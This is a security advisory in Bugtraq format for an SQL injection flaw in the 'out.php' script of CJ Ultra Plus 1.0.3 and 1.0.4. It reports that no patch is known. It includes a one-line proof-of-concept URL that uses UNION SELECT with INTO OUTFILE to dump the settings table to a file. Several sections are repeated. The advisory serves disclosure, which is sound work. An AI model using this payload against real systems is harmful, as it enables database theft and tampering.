CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
BID:13533
Info
CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
| Bugtraq ID: | 13533 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 06 2005 12:00AM |
| Updated: | May 06 2005 12:00AM |
| Credit: | Discovery is credited to Kold <[email protected]>. |
| Vulnerable: |
CJ Ultra Plus CJ Ultra Plus 1.0.4 CJ Ultra Plus CJ Ultra Plus 1.0.3 |
| Not Vulnerable: | |
Discussion
CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
CJ Ultra Plus is prone to an SQL injection vulnerability.
This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
CJ Ultra Plus is prone to an SQL injection vulnerability.
This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Exploit / POC
CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
No exploit is required.
The following proof of concept is available:
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*
No exploit is required.
The following proof of concept is available:
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*
Solution / Fix
CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
CJ Ultra Plus OUT.PHP SQL Injection Vulnerability
References:
References: